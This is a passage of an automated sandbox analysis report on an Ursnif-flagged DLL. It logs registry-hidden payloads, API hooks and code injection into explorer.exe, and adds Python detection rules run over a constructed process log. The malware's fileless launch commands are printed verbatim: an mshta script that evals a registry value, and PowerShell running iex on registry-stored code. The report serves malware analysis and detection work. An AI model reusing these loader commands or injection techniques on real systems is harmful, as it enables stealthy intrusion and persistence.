          Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: C:\Windows\explorer.exe Process created: unknown unknown (5 identical entries)
          Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
          Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: NJPcHPuRcG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
          Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: NJPcHPuRcG.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation:

          Suspicious powershell command line found
          Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277AF23 push ecx; ret
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0277ABF0 push ecx; ret
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0542769F push ecx; ret
          Source: initial sample Static PE information: section name: .text entropy: 6.87914884899
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll
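          The mshta.exe to powershell.exe to csc.exe chain recorded above (an inline HTA that evaluates script read from a key under HKCU\Software\AppDataLow, PowerShell that iex-es a registry value, then csc.exe compiling a response file from %TEMP%) is what the Sigma rules "MSHTA Spawning Windows Shell" and "Dot net compiler compiles file from suspicious location" key on, and the regsvr32.exe to control.exe -h to rundll32 Control_RunDLL hop is the sample's own launch path. The following Python is an added example, not part of the sandbox report and not code from the sample, that runs those checks over a constructed process-creation log modelled on the report's process tree; the log schema, the PIDs and the benign control rows are assumptions, and the command lines are abbreviated copies of the ones shown above.

```python
"""Process-chain detection for the fileless launch recorded in this report.
Hypothetical event schema and PIDs; command lines abbreviated from the report."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# iex / Invoke-Expression fed by Get-ItemProperty (gp) on an HKCU or HKLM path
RE_REG_IEX = re.compile(r"\b(iex|invoke-expression)\b.*\b(gp|get-itemproperty)\b.*hk(cu|lm)", re.I)
# csc.exe response file under a Temp directory
RE_TEMP_CMDLINE = re.compile(r"\\temp\\[^'\" ]*\.cmdline", re.I)
# inline HTA whose real script is pulled out of the registry
RE_HTA_REGREAD = re.compile(r"about:<hta:application.*regread\(", re.I | re.S)


def rule_mshta_spawns_shell(ev, parent):
    return parent is not None and basename(parent.image) == "mshta.exe" and basename(ev.image) in SHELLS

def rule_hta_reads_registry(ev, parent):
    return basename(ev.image) == "mshta.exe" and bool(RE_HTA_REGREAD.search(ev.cmdline))

def rule_powershell_iex_from_registry(ev, parent):
    return basename(ev.image) in {"powershell.exe", "pwsh.exe"} and bool(RE_REG_IEX.search(ev.cmdline))

def rule_csc_compiles_from_temp(ev, parent):
    return basename(ev.image) == "csc.exe" and bool(RE_TEMP_CMDLINE.search(ev.cmdline))

def rule_regsvr32_spawns_control(ev, parent):
    # regsvr32 -> control.exe -h -> rundll32 Shell32.dll,Control_RunDLL is the chain in the report
    return parent is not None and basename(parent.image) == "regsvr32.exe" and basename(ev.image) == "control.exe"


RULES = {
    "mshta_spawns_shell": rule_mshta_spawns_shell,
    "hta_reads_registry": rule_hta_reads_registry,
    "powershell_iex_from_registry": rule_powershell_iex_from_registry,
    "csc_compiles_from_temp": rule_csc_compiles_from_temp,
    "regsvr32_spawns_control": rule_regsvr32_spawns_control,
}


def detect(events):
    """Run every rule over every event with its parent resolved; return [(rule_name, pid), ...]."""
    by_pid = {e.pid: e for e in events}
    return [(name, ev.pid) for ev in events for name, rule in RULES.items()
            if rule(ev, by_pid.get(ev.ppid))]


def ancestry(events, pid):
    """Image names from the oldest ancestor present in the log down to pid, for triage output."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
GUID = "86EC23E5-2D5A-A875-E71A-B15C0BEE7550"
# Constructed sample log: invented PIDs, parent/child relations as in the report's process tree
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\System32\loaddll32.exe", r"loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'"),
    ProcEvent(1001, 1000, r"C:\Windows\SysWOW64\regsvr32.exe", r"regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll"),
    ProcEvent(1002, 1001, r"C:\Windows\System32\control.exe", r"C:\Windows\system32\control.exe -h"),
    ProcEvent(1003, 1002, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe Shell32.dll,Control_RunDLL -h"),
    ProcEvent(2000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2001, 2000, r"C:\Windows\System32\mshta.exe",
              "mshta.exe about:<hta:application><script>eval(new ActiveXObject('WScript.Shell')"
              ".regread('HKCU\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\" + GUID + "\\\\Actidsrv'))</script>"),
    ProcEvent(2002, 2001, PS,
              "powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp "
              "'HKCU:Software\\AppDataLow\\Software\\Microsoft\\" + GUID + "').basebapi))"),
    ProcEvent(2003, 2002, CSC, r"csc.exe /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'"),
    # benign look-alikes that must not fire: a build-system csc.exe and a scripted powershell.exe
    ProcEvent(3000, 900, r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "devenv.exe"),
    ProcEvent(3001, 3000, CSC, r"csc.exe /noconfig @'C:\src\app\obj\Debug\app.cmdline'"),
    ProcEvent(3002, 2000, PS, r"powershell.exe -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for name, pid in detect(SAMPLE_EVENTS):
        print(f"{name:30s} pid={pid}  chain={' -> '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

          The parent-aware rules (mshta spawning a shell, regsvr32 spawning control.exe) need the parent event to be in the same log window; on a real feed, resolve ppid against a process cache rather than the current batch, and treat the registry-fed iex rule as the highest-fidelity of the five because the GUID-named key under AppDataLow is the persistence artefact worth pulling from the host.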

          Hooking and other Techniques for Hiding and Protection:

          Yara detected Ursnif
          Source: Yara match File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
          Hooks registry keys query functions (used to hide registry keys)
          Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
          Modifies the export address table of user mode modules (user mode EAT hooks)
          Source: explorer.exe EAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
          Modifies the import address table of user mode modules (user mode IAT hooks)
          Source: explorer.exe IAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
          Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
          Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (98 identical entries)
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (8 identical entries)
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5156
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3564
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_054016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
          Source: explorer.exe, 00000024.00000002.616609988.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000024.00000000.411669645.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000024.00000002.622481126.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_05401F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

          HIPS / PFW / Operating System Protection Evasion:

          Changes memory attributes in foreign processes to executable or writable
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute read
          Source: C:\Windows\explorer.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
          Compiles code for process injection (via .Net compiler)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File written: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 9B851580
          Source: C:\Windows\explorer.exe | Thread created: unknown EIP: 9B851580
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3472 base: EB0000 value: 00
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3472 base: 7FFA9B851580 value: EB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3472 base: 3020000 value: 80
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3472 base: 7FFA9B851580 value: 40
          Maps a DLL or memory area into another process
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\explorer.exe | Section loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\explorer.exe | Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3472
          Source: C:\Windows\explorer.exe | Thread register set: target process: 4016
          Source: C:\Windows\explorer.exe | Thread register set: target process: 4288
          Source: C:\Windows\explorer.exe | Thread register set: target process: 4448
          Source: C:\Windows\explorer.exe | Thread register set: target process: 5936
          Source: C:\Windows\explorer.exe | Thread register set: target process: 6488
          Source: C:\Windows\explorer.exe | Thread register set: target process: 2092
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: EB0000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 3020000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
          Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
          Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
